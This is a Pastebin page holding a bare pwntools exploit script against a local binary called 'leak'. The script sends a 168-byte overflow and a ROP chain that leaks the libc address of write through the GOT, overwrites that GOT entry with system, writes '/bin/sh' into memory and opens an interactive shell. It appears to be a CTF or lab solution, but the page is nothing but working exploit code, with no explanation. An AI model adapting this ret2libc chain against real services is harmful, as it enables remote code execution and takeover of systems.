daily pastebin goal
48%
SHARE
TWEET

Untitled

a guest Feb 13th, 2018 73 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from pwn import *
  2.  
  3. e = ELF("./leak")
  4. l = ELF("/lib/x86_64-linux-gnu/libc.so.6")
  5.  
  6. pppr = 0x000000000040068a
  7.  
  8. s = remote('127.0.0.1', 5000)
  9. s.recvuntil(": ")
  10.  
  11. payload = "A"*168
  12. payload += p64(pppr)
  13. payload += p64(constants.STDOUT_FILENO)
  14. payload += p64(e.got['write'])
  15. payload += p64(0x8)
  16. payload += p64(e.plt['write'])
  17.  
  18. payload += p64(pppr)
  19. payload += p64(constants.STDIN_FILENO)
  20. payload += p64(e.got['write'])
  21. payload += p64(0x8)
  22. payload += p64(e.plt['read'])
  23.  
  24. payload += p64(pppr)
  25. payload += p64(constants.STDIN_FILENO)
  26. payload += p64(0x601048)
  27. payload += p64(0x7)
  28. payload += p64(e.plt['read'])
  29.  
  30. payload += p64(pppr)
  31. payload += p64(0x601048)
  32. payload += ("JUNK"*4)
  33. payload += p64(e.plt['write'])
  34.  
  35. payload += "gg"
  36. s.sendline(payload)
  37. s.recvuntil("gg\n")
  38.  
  39. got_leak = u64(s.recv(8))
  40. libc_base = got_leak - l.symbols['write']
  41. s.send(p64(libc_base + l.symbols['system']))
  42. s.send("/bin/sh")
  43. s.interactive()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top